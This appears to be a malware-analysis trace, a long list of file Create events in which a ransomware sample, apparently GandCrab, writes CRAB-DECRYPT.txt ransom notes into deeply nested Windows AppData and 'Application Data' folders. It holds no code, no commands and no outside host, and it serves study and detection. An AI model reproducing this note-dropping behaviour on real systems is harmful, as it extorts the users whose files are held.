Create C:\Documents and Settings\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
